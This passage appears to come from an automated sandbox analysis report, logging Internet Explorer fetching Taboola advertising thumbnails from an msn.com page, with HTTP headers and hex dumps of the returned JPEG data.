                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC75INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 16005
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 576534902803110021316724602264134556124,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "31d2c3f7be156b4e917d219f6adce3aa"
                                                last-modified: Sun, 29 Aug 2021 10:39:28 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 99
                                                x-ratelimit-reset: 1
                                                x-request-id: 20be02d4eabb87f8f2afdf746e337dba
                                                x-envoy-upstream-service-time: 303
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 181126
                                                X-Served-By: cache-wdc5540-WDC, cache-dca12928-DCA, cache-hhn4052-HHN
                                                X-Cache: MISS, HIT, HIT
                                                X-Cache-Hits: 0, 1, 1
                                                X-Timer: S1631266105.730473,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC76INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 00 01 02 08 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 bd 52 e1 aa a6 90 88 7e c2 62 d7 93 87
                                                Data Ascii: JFIF+""+2*(*2<66<LHLdd+""+2*(*2<66<LHLdd7"5R~b
                                                2021-09-10 09:28:24 UTC78INData Raw: 30 25 29 d3 07 6c 89 d4 9c 5d b2 02 cd 8c f1 de 73 ce 76 df a8 b1 e6 39 6d c3 4e 00 86 0f b8 12 75 1e 7a ce 28 eb a6 b4 38 c3 d2 da c5 06 2d ca c5 1b 7d 2b cf 4f 7d b0 52 3b 4f 58 3b 9e 9a eb 8d 9c 76 71 40 6c ee 7b ac 9c b4 da e6 53 38 4b ba d3 60 f1 29 aa 43 64 a3 1d 11 91 76 fd 22 61 c8 08 91 44 18 60 48 bb 6c 60 b8 78 d9 fd eb 08 c6 76 14 06 7d 1a 66 2a 12 a6 ed 05 58 04 c7 6d 9c 30 02 e2 01 d2 1c f7 dd 73 ca 2b 1d d2 39 d4 f5 a6 8e 67 55 1c cc 15 ee 6f 23 66 36 be 45 e6 3a a8 03 3c ca cb d9 0c c2 8f 88 cc c1 12 74 43 32 96 ed de 65 ea ab dc c3 04 9d ee 62 ac 77 de 65 6f da b9 9d df ff c4 00 34 10 00 02 02 02 02 01 03 03 01 07 03 04 03 00 00 00 01 02 03 04 05 06 00 11 12 07 13 21 14 22 31 15 08 10 16 20 23 32 41 24 33 51 25 34 42 61 26 36 53 ff da 00
                                                Data Ascii: 0%)l]sv9mNuz(8-}+O}R;OX;vq@l{S8K`)Cdv"aD`Hl`xv}f*Xm0s+9gUo#f6E:<tC2ebweo4!"1 #2A$3Q%4Ba&6S
                                                2021-09-10 09:28:24 UTC79INData Raw: 55 e7 82 47 44 01 9d 4c a1 13 9b a6 55 a9 5a d0 2b 41 6a d2 89 22 28 4e 63 07 5b 3d 10 ae f2 cf 93 de e3 4f a5 cb 50 c5 d3 cc 49 99 fa e9 79 76 36 b0 d5 28 d6 4b 15 a0 fd 52 e6 41 ed bc 14 dd 14 c4 cb 5a 52 df 24 d7 0b ff 00 99 88 c7 f2 4e dd 6a 6a 98 0b 76 2b cb a4 e6 72 b9 8b 37 d3 23 34 7b 6e e2 21 79 17 22 36 1d 84 ea 4b 92 6c 9e 13 64 cf 5c cf 63 2b 59 c9 ee 19 fc de 3b 62 b7 56 9e 4e b8 ee 41 1b b4 7e 51 a0 89 94 01 d0 ec 6f 9d 1d 3b 65 e3 05 38 4b aa 24 2e b1 fd a3 95 e1 b4 ec 4c 50 00 d2 45 3f d5 4d 9f d9 35 ed 52 03 3d fb 55 b6 3b 99 5d f3 5e ce e6 65 b2 7c 01 6f 1b 91 c8 25 49 6b c8 62 c8 d6 63 6a 39 7e a9 91 64 9a 51 ae d0 98 56 bb 94 91 31 db f6 9d 91 96 5a b6 ee 4d 56 6a 2e a4 a4 b1 dc 42 b2 8e 45 2b b4 8a af c5 65 b3 e0 ad 0e d9 63 17 26 2c
                                                Data Ascii: UGDLUZ+Aj"(Nc[=OPIyv6(KRAZR$Njjv+r7#4{n!y"6Kld\c+Y;bVNA~Qo;e8K$.LPE?M5R=U;]^e|o%Ikbcj9~dQV1ZMVj.BE+ec&,
                                                2021-09-10 09:28:24 UTC80INData Raw: 3c 6c 98 2d a4 4c f6 04 bb 1e b7 b3 ec 75 92 0b 77 e7 f4 fb 61 81 bf a5 3b e9 db 5a f4 7f 4f 6d 67 6c 1f 3f a4 90 04 cf f3 31 3f f8 04 91 a4 f1 0d cd 92 78 e2 ae d1 93 99 96 49 6f 57 25 b5 3f 4f b5 4c f6 0f 1d 94 c9 6c fa fe 87 73 17 8c f6 75 7d c3 2d 96 10 56 8b 13 b8 61 f6 fd 68 e9 f9 b4 8e bc 9d 89 07 11 fe 9e 64 97 93 00 bd fc fe cf 59 73 0e c9 98 c0 bb fa a1 30 97 d5 0d b5 87 0c ab 14 4e e3 90 05 45 50 78 d6 00 fc 71 db ea 2d a9 67 54 6f 2f 36 34 fb f2 59 bc bd 11 a9 8b b5 af 7e a4 55 2d 60 a5 00 a6 40 b6 39 be 52 65 8a ab 0f b4 0a 91 9f c5 73 41 7f cd 59 9e d4 4c d2 c3 0d 8e 88 60 86 20 22 45 0c db 64 9e fa c4 80 e5 51 64 94 87 e7 a6 7b cd db b6 31 ba 96 4d 7e 83 1f 5e 18 a1 b5 84 16 6f 45 5e 49 80 ce 60 29 64 f1 b6 a1 8e 50 26 a9 34 b5 6c 70 b0 23
                                                Data Ascii: <l-Luwa;ZOmgl?1?xIoW%?OLlsu}-VahdYs0NEPxq-gTo/64Y~U-`@9ResAYL` "EdQd{1M~^oE^I`)dP&4lp#
                                                2021-09-10 09:28:24 UTC82INData Raw: 94 3c 48 91 1d 99 40 fe ee b8 67 7a 96 29 5c 58 b6 ac bd 71 96 f0 c3 8c 00 ad 94 4b d8 c6 e2 bc b0 4d 2d 49 d5 02 33 87 f1 5f 6f b2 41 b1 1a 24 6e 07 2b 46 a5 4c e1 e5 20 59 9f c8 80 ec 9e 3c f9 f0 6e 86 70 7b 54 a2 f1 7a ab fd 0a 0e 13 7f b0 a2 ce 12 b2 09 bf dd 61 ce b8 3e 3f 70 fc 72 cc 9e dc 32 3f 3d 3b c6 36 0f 4e c0 e3 19 09 e4 61 fc 58 37 3d 63 c5 a5 ed 59 2d a9 5e 03 e2 c0 f3 b6 ab 69 25 0b 98 81 a6 59 3c 39 e9 d6 69 22 87 07 30 3b d4 4b 8b db 24 98 a0 61 d4 8e 16 0b c3 d9 59 9d 25 96 36 21 41 a7 1c 85 5d 9a 6b 8a 27 92 45 ec f9 2a 04 41 3a 2b f9 02 f9 b8 82 56 8c f2 a9 55 8b 10 59 b7 d9 d6 4d ba 38 50 b1 2c ec 7f 96 40 85 4b 49 10 f5 ff 00 d4 1b 32 bf d3 6b 8f eb af aa 13 87 8e 2a 76 bd 58 f5 4e f1 29 2e dd 90 7d 93 25 14 b7 ef 65 a1 99 2c 43 14
                                                Data Ascii: <H@gz)\XqKM-I3_oA$n+FL Y<np{Tza>?pr2?=;6NaX7=cY-^i%Y<9i"0;K$aY%6!A]k'E*A:+VUYM8P,@KI2k*vXN).}%e,C
                                                2021-09-10 09:28:24 UTC83INData Raw: c7 ef e6 30 e0 26 dc 23 92 fd 57 8d de 29 e2 91 a3 9f 8a 3b 20 73 b0 83 95 58 b4 bc 91 fc 54 f3 d3 b3 ed e5 36 6c 83 34 36 e6 8d 14 2c b1 e4 ec 1e fb 90 df b5 ed b8 53 05 bf 6e 28 e2 78 96 e2 7b 87 b4 ff c4 00 34 11 00 02 01 03 03 02 04 03 07 03 05 00 00 00 00 00 01 02 00 03 11 21 04 12 51 31 41 10 22 32 71 13 20 b1 05 42 52 61 62 81 91 14 a1 c1 15 23 33 43 72 ff da 00 08 01 03 01 01 3f 00 1c 43 1f d5 2d 2d 15 09 f6 81 53 f1 7f 68 69 10 bb 87 4f 17 ca 37 b1 98 ee bf da 66 dd 0c 10 98 fe a9 71 29 b2 55 70 a3 3c cd 3d 01 5e a8 0d ff 00 1a 8b 9f f0 23 68 74 cc 30 96 f6 95 74 d4 e9 2e db 9b 31 9a 97 6a 35 8a 02 08 87 50 f6 ec 20 ab 50 df cd 03 67 04 1c 73 0f 9c 11 71 38 86 6b 1c 8a 80 76 86 ab 5a d3 ec da 55 2a 35 56 1d 11 00 3e ed d3 e9 29 7f b3 4f d2 6e 73
                                                Data Ascii: 0&#W); sXT6l46,Sn(x{4!Q1A"2q BRab#3Cr?C--ShiO7fq)Up<=^#ht0t.1j5P Pgsq8kvZU*5V>)Ons
                                                2021-09-10 09:28:24 UTC84INData Raw: 71 46 85 55 1b d0 a8 75 41 af 40 be f0 1c ff 00 6e 93 eb 26 ec ea f5 33 ad c5 e6 27 01 be 16 16 79 c0 9b f9 8c ce 13 26 36 c5 77 a8 11 06 e5 40 e6 a6 7d 6c a7 61 75 ce 7c 33 87 c2 17 5e 4e 6a c3 4f a4 04 74 61 44 6d 06 a0 39 ca bd 07 55 73 db bc 55 5b b3 94 19 f4 ff 00 50 ae f2 a2 8d e7 00 48 c6 54 0b b3 34 2e da b7 31 31 91 90 b9 b1 bc f8 87 01 a3 2b be 30 41 dd 8f 62 26 24 cb 90 e8 4b df 99 ed 38 2c 1f b3 02 95 7a 85 cf 96 39 8f a4 f5 a8 cf 97 11 b2 ca cb 7b ed 46 26 8c 9a 5e 8d 86 20 1b 88 38 7f ae b5 dd 1b de 2a e1 28 76 3a 6e 00 49 da 26 2e a6 70 d6 ae 68 0d 86 c2 6a bd c4 53 b5 76 9c 5a ea 55 6e a0 cc 68 a1 95 54 01 6c 0e c2 06 30 1d 89 ee 6e 3a 96 57 98 72 9c 78 51 4d 58 27 fd ed 03 65 61 6b 8d 25 71 3d 11 67 48 26 0f 31 96 15 d4 f4 6d 8c d5 a4 ef
                                                Data Ascii: qFUuA@n&3'y&6w@}lau|3^NjOtaDm9UsU[PHT4.11+0Ab&$K8,z9{F&^ 8*(v:nI&.phjSvZUnhTl0n:WrxQMX'eak%q=gH&1m
                                                2021-09-10 09:28:24 UTC86INData Raw: 3c 45 db 77 35 39 36 fd f7 34 2e da 1d 19 5f a1 37 a1 62 7c ad cd 31 21 d7 23 ad 63 9a f0 c3 a1 99 b9 e8 aa 58 55 c6 c0 2f d7 18 ab 0a b5 05 1e 66 a7 99 88 20 39 1b 23 dc 2b 29 23 6a 75 31 c4 2e 1b bb f9 15 ab 7b ea 99 91 e5 06 ea c1 7f 09 23 4b e7 67 cd 6f 3b 5c e4 d0 5d 46 a9 16 56 f3 0b ca ad 5b e0 a4 8a 4b e9 50 49 22 ee 22 c9 7b 31 34 c7 4f 26 9f 4d ab 87 59 60 a1 de 43 62 84 72 18 01 c5 58 fd cc 2c 77 34 a5 84 28 f7 1b 41 b3 d4 cd 18 99 07 72 ae b9 2f c1 a9 17 70 20 13 b0 d3 4e 64 81 64 16 db 80 4f 19 a2 6c 70 0d 35 c3 6e 04 f5 f4 15 82 78 ac 4b d9 73 f1 d0 2c 6f 57 64 d3 49 22 df d1 4b 0a 48 20 21 4e d5 16 b9 f5 a7 2a a0 6c 90 9b e5 4d a8 c8 89 b8 5c 8b 5f c8 d6 d6 43 8a 4e ff 00 b6 bb 53 b3 74 91 59 43 32 2c b0 aa bd cb 70 a0 44 e7 15 7e ce ec ed
                                                Data Ascii: <Ew5964._7b|1!#cXU/f 9#+)#ju1.{#Kgo;\]FV[KPI""{14O&MY`CbrX,w4(Ar/p NddOlp5nxKs,oWdI"KH !N*lM\_CNStYC2,pD~
                                                2021-09-10 09:28:24 UTC87INData Raw: de f6 fa 52 a7 1b 42 82 7c 46 83 eb 5b 44 ef a2 d3 35 b7 08 98 11 bc 86 c0 ef 76 90 a4 f4 a5 ec dd 5c 4a 37 c5 ac f0 c7 93 b6 e2 43 80 01 c1 dd 4f 18 7f 95 80 ba 37 f0 b0 c1 a0 d1 e7 20 f0 68 00 7e 94 06 e2 70 1f c4 2d 42 2d 28 0c 67 66 17 ba da 83 ba c4 04 c7 3f 27 4a 58 83 1f 12 80 c4 16 14 bf ee f6 d5 0b 1e ec d8 c9 51 3e b4 b7 e0 9b 1b de 90 eb 2c a1 89 52 49 c5 c5 0e 49 05 46 2d 72 07 d7 ce 87 95 8f 95 01 70 6d f4 34 33 d9 53 ab 13 fc 35 e0 1a 39 80 7e 2e 36 1c da 91 74 b1 2f e2 ce ee 12 34 f2 dc cf 60 29 3b 4b 5a 9e 08 34 f0 a4 86 22 fe 6f 2d 82 94 5f 43 5d a3 a2 d2 9d 3a 43 24 50 4a 23 50 e5 6c cf 68 c2 d8 31 ab ef 66 3b ad cd fa 93 eb 5f 3a 9a 3a c6 d7 f6 70 7e d6 ec b4 42 1c cb a6 fc 29 a6 d3 79 ba 30 b1 4e 59 6b bd 8f a6 dc ba 1e a0 83 90 45 49
                                                Data Ascii: RB|F[D5v\J7CO7 h~p-B-(gf?'JXQ>,RIIF-rpm43S59~.6t/4`);KZ4"o-_C]:C$PJ#Plh1f;_::p~B)y0NYkEI
                                                2021-09-10 09:28:24 UTC88INData Raw: a2 91 67 81 67 77 66 28 8c bf 5a d2 a2 85 c9 54 4f 98 9e 32 2b bd 02 39 37 bb c4 a3 71 db cd e8 8e d1 8f b5 0b c9 e1 e1 0b 92 4d 42 35 ad d8 64 20 da 6f df 96 3c 7a d2 fc 84 78 b3 d6 be bc 5a d4 c5 76 90 d1 8b 11 7c 67 d2 c2 b1 62 2f b8 93 40 92 01 1e a4 11 6e 28 16 11 07 3e bd da ed a4 36 19 db 7f cf 35 0c b0 6b 34 cb 3e 98 7d a5 04 86 37 c8 39 c0 a9 f4 b2 5f c3 de 2d 95 bd 55 86 18 7b 7c 72 9f aa 9a e4 56 f9 7b 35 66 ec f7 bf 94 4f be 3f c9 1c 0a b8 d3 76 76 86 1f ce 21 2f f3 7f 85 ae c4 0f 65 c5 67 cf ad 1b c8 c2 fe c2 85 fd 4d 85 77 a0 63 8b 44 9f 9f 35 68 83 5a 09 65 d3 2a 42 65 40 77 48 aa 49 2c 82 d6 dd cb 57 61 aa 82 3b bb e8 ae 54 0f 30 0f 35 d9 83 6c e2 50 f0 e9 5a 36 27 f3 a8 e6 51 d7 69 5a 67 f2 2a 6a 7f cc 50 5b 2a f2 6e 05 60 b5 9e d6 e8 2d
                                                Data Ascii: ggwf(ZTO2+97qMB5d o<zxZv|gb/@n(>65k4>}79_-U{|rV{5fO?vv!/egMwcD5hZe*Be@wHI,Wa;T05lPZ6'QiZg*jP[*n`-
                                                2021-09-10 09:28:24 UTC90INData Raw: 68 10 70 6e 28 e7 9f 2a da 0b 0e 41 5b 0d d9 00 9a b3 36 a7 4e db 95 40 5c 35 ab bc 85 d1 a2 92 33 95 64 7e 41 1d 6e 31 53 bc 4f 02 4c d1 3d 8b 42 5c 9f 00 6e a2 d9 17 a9 07 ba ff 00 42 6a 56 f6 16 fe 74 be ee e7 fd 05 68 e6 33 23 2c 7a 95 93 50 92 e9 89 16 0e 8a b2 6c 6b 79 32 9a 0e e7 ac a4 8f d5 ed 48 08 c4 ac 01 38 e3 a3 10 de 63 00 d4 56 40 1e cf f3 75 36 24 6d 1d 39 03 e9 41 6e 0e 01 b8 c7 20 dc 0f 3f 6a 31 1f dd e5 68 48 3f 7a 32 2f 53 21 ea 1a 33 4a 68 28 02 80 94 99 75 da c5 6e 93 ea 08 02 32 3a 32 46 a0 11 d1 8b 0a b4 65 70 be be 74 bd d8 6b 96 27 20 d5 81 5c db 06 e6 81 3b 87 3f ce 8b 28 22 c5 fa dc 5f af 15 f2 df 03 a8 14 32 b7 6f 4b 8c 5a 89 37 b1 63 8e 94 4d 94 5b cc f5 34 a2 d3 45 83 ce 28 ee 6c 8e 80 80 6b f0 e5 d4 30 85 ba 77 49 e1 4f d0
                                                Data Ascii: hpn(*A[6N@\53d~An1SOL=B\nBjVth3#,zPlky2H8cV@u6$m9An ?j1hH?z2/S!3Jh(un2:2Feptk' \;?("_2oKZ7cM[4E(lk0wIO
                                                2021-09-10 09:28:24 UTC91INData Raw: 7f 67 a3 10 73 f8 90 7e 19 b1 f6 b5 6e 66 da 1a dc 5f a9 a0 a1 98 12 40 e4 f1 43 c8 fd 0d 62 80 3d 6b 7d d4 03 73 61 c5 2d fb b2 d7 c0 17 1c f3 57 5f b0 9b 8f 5d bc b5 74 fb a3 74 97 1e a1 47 27 eb c7 c2 e3 e0 00 de 47 f8 4f c6 d1 cc 44 72 79 0f dd 6f a1 fb 8d 33 ab 25 91 73 b5 43 82 49 c6 01 be 4d 00 9a 24 97 f1 18 96 77 77 c3 7b 2e 29 ae 4e 08 53 82 b4 6f 57 52 78 39 a2 58 8e 78 07 d8 51 b6 7d 8d e9 54 01 62 17 a0 07 14 2f b1 94 7b 79 53 18 66 da b2 a8 63 ba cf c8 dd f5 a5 d5 c3 d2 09 c8 8a 65 f4 dd 85 6f d2 a7 d2 bf 94 a8 54 1f 63 c1 f8 f8 47 34 56 fc 0f 21 d0 7c 6e 2b 1b ff 00 d0 fc 45 6d 99 05 95 db 89 14 7a fe f5 0e 3a 1a 87 4f 26 a6 75 89 1e 5b ed 17 36 27 14 f3 47 18 5d da 82 85 5a 66 71 de 6f 71 d3 0c 00 15 65 07 26 98 ed e8 a6 df 9d 59 90 82 45
                                                Data Ascii: gs~nf_@Cb=k}sa-W_]ttG'GODryo3%sCIM$ww{.)NSoWRx9XxQ}Tb/{ySfceoTcG4V!|n+Emz:O&u[6'G]Zfqoqe&YE


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.549821151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-09-10 09:28:24 UTC64OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC100INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 26657
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 467157528030215451734401040394553622763,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "4559f937497c9db5ab43d5231d803695"
                                                expiration: expiry-date="Sun, 22 Aug 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                last-modified: Thu, 22 Jul 2021 08:16:46 GMT
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-envoy-upstream-service-time: 24
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 1642925
                                                X-Served-By: cache-wdc5531-WDC, cache-dca17778-DCA, cache-hhn4057-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.734114,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC104INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 0a 0a 0a 0a 0a 0a 0b 0c 0c 0b 0f 10 0e 10 0f 16 14 13 13 14 16 22 18 1a 18 1a 18 22 33 20 25 20 20 25 20 33 2d 37 2c 29 2c 37 2d 51 40 38 38 40 51 5e 4f 4a 4f 5e 71 65 65 71 8f 88 8f bb bb fb ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 00 02 07 01 08 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d0 f3 78 2c 26 b7 37 cb 88 2f 6b 9b 4a 92
                                                Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""3 % % 3-7,),7-Q@88@Q^OJO^qeeq74x,&7/kJ
                                                2021-09-10 09:28:24 UTC106INData Raw: c9 e8 56 c9 51 d5 0d 22 ac 7a 5b 73 a0 cd 34 f5 b6 f1 14 95 42 ea 92 5a 80 a5 9a a4 44 2c 6a 4e dd b7 80 ac 8d c2 55 4c 3c d9 a4 e8 7f c1 b6 5e dd 53 ec f1 eb ed e3 49 c9 e8 2f 70 3d a3 1e 7c 24 45 a2 db d1 7c 89 32 33 7a a0 b4 29 ad 42 e1 e4 a6 d5 cf 43 b5 4a 86 77 b1 b9 2b b1 a3 49 54 0a 8c a1 e1 4b 82 61 23 d0 b9 fd 7e 9f a3 bd 62 83 93 07 08 ae 7b e5 3d 5d fd af 8f d5 20 aa 5d 4f 58 af 43 cf 82 77 2c 33 b3 c4 e5 6f 52 8a 47 24 d4 e6 d4 2b 3a f7 06 61 cd 28 d2 99 bc b4 2d 58 fa c7 31 23 58 0c 40 d2 8b ed ef 44 f9 9f 22 4e bb e7 af 5b 87 3b ac cd c8 ec c2 79 d7 f4 10 5e 9f 91 d9 f9 36 aa 8a af 06 5f cc b5 e7 df 45 e6 ce 5d dc d1 45 ee 61 b1 c6 a5 19 6f 10 59 fa 9f 22 32 01 9e 0d 3b 4d 31 38 9f 90 3c f7 6e 75 78 ba 4a ce 23 4f 5c 9e 2d 76 04 2a eb e2 df
                                                Data Ascii: VQ"z[s4BZD,jNUL<^SI/p=|$E|23z)BCJw+ITKa#~b{=] ]OXCw,3oRG$+:a(-X1#X@D"N[;y^6_E]EaoY"2;M18<nuxJ#O\-v*
                                                2021-09-10 09:28:24 UTC109INData Raw: 9e 73 7f e7 4a f3 be 6b 3f fa 75 e7 dc ce 9f ae 4c 7d 43 e5 71 13 59 c4 ff 00 a8 dc 82 2d 35 9e 3e 3f a8 bb 17 bf 8f ee f4 7d 45 d3 ed 5b 7e ec 1f ea 23 aa 93 d6 df 16 8f a9 13 13 da fc 71 6f a8 83 6a 07 21 e3 b3 f5 29 01 da f5 3e 2d fe a5 e3 0b bf bb 33 fe a6 f1 f8 ef e4 9d 7e a2 60 5b f4 05 7e a2 f1 9b 77 fc c7 d4 4e 2d fc cc 3e 77 c5 89 5b da ad c7 3a e2 93 ff 00 be 1f d3 f6 4c f4 4b 4c 4f 54 27 e3 ab 13 bc 74 49 fc fe ce d3 df aa 7e 3a 1d a2 7a 2a cb 88 44 bb 25 d7 4a 93 e3 7a 1f e3 7f 0d a8 c7 43 be 95 80 36 4c 85 5f 7c ab f7 69 8a 9c 36 80 fa 9f f9 09 d2 2a 75 9d d8 b5 b4 0d 67 eb 79 a3 17 56 a2 b1 35 e2 ff 00 34 de 72 92 b6 b5 ef 23 9c e4 da be 5e a3 b5 a1 ad 7b ca f4 b7 42 21 44 59 a0 e0 c5 18 89 34 a8 47 5e d1 fb 3c 7a 2c 7e 7a 8e fd 4f 57 8e bb
                                                Data Ascii: sJk?uL}CqY-5>?}E[~#qoj!)>-3~`[~wN->w[:LKLOT'tI~:z*D%JzC6L_|i6*ugyV54r#^{B!DY4G^<z,~zOW
                                                2021-09-10 09:28:24 UTC112INData Raw: 05 17 59 b5 66 b5 20 3c 42 0b 5a f3 14 ed db b4 56 3b 44 76 b4 cd e7 ca f3 e3 4f e8 82 7e 80 d2 f1 42 f1 47 14 10 0e 4a b0 cb 23 23 8b d4 66 fb 82 a2 ac 32 2a 9a 29 6a cf a2 d7 2c fc 8a d6 84 85 aa 9e 81 ae 7d 37 cc 8e 1d 72 97 0e 69 ee 2c 56 d1 91 67 c2 d6 b3 15 2d 72 75 5b 42 c1 66 d5 bf 33 c8 3e bd 59 d9 c9 a7 d4 ed 43 d2 04 e6 49 70 dd 9a 00 c2 8c 3e 35 a9 97 9e c3 cd 4f 35 cc 38 d4 77 59 46 08 d7 c6 35 cf 0e 63 9b 79 06 e1 a4 6a d6 af 24 df d3 a5 2d 9c d7 01 dd b8 d1 62 32 a3 1b 53 47 56 8a 29 99 1c 07 8e 62 26 66 f9 5e f3 d1 91 43 da b9 d7 b7 9d 3b 4c 4f b2 23 b7 95 ad 33 3f 88 8c ee 52 0e 3e ad 2c da 63 e4 19 fa 75 b3 89 99 3e 2b ae 3d 3d 66 ac 3b 86 e4 5f d5 6b 9e b1 43 47 8c 30 73 df db 7a 50 64 03 49 4d a2 a5 5a ad e8 3a b1 3a 4e 6a aa 1b 43 f6
                                                Data Ascii: Yf <BZV;DvO~BGJ##f2*)j,}7ri,Vg-ru[Bf3>YCIp>5O58wYF5cyj$-b2SGV)b&f^C;LO#3?R>,cu>+==f;_kCG0szPdIMZ::NjC
                                                2021-09-10 09:28:24 UTC113INData Raw: a2 e4 de d8 93 d4 72 cd 9a 29 2b 36 b9 0f 15 76 87 02 e6 a5 c5 15 2c 45 64 b0 39 8f 6a e3 01 c6 dd 28 20 b7 aa 04 ca 31 09 51 6e 59 69 34 88 9f 39 37 f5 54 5c ea 00 70 a4 d8 44 2e 5f 1a cb d8 39 68 0c ce 45 c1 ef 9d 65 27 b0 73 3e 2c 47 a2 2f 75 bb c4 2f 7c fe 5d b9 ad a0 f2 2c 96 99 cc c0 a2 04 82 d8 1a 67 88 af ab 97 2c ae 76 5b c9 ac 6e 37 8d f6 5e 3f 9c 85 ba f1 fe 5d 12 f4 14 44 5a ee ec a2 ac cf f9 af f2 e7 4d e4 25 15 61 f6 ed e3 6b 1b e4 d2 f6 b4 4d a9 e3 5e d6 99 b9 22 2b 69 80 19 9a 08 16 21 af 8c d0 8a 36 34 44 75 1c cc 58 5d ae 52 ef 22 18 0d 01 42 ec 6e 69 8a 8a d4 49 60 32 6f 08 60 8c 8a e1 33 6b 0a a8 ec 1f 1e ca 51 42 34 53 14 81 20 a9 8f af 96 a6 55 86 3b b3 b5 96 7c 35 ea 5b d6 4e 43 1a 4b 44 14 65 93 c5 00 1e 44 e0 31 39 43 07 c6 d0 e3
                                                Data Ascii: r)+6v,Ed9j( 1QnYi497T\pD._9hEe's>,G/u/|],g,v[n7^?]DZM%akM^"+i!64DuX]R"BniI`2o`3kQB4S U;|5[NCKDeD19C
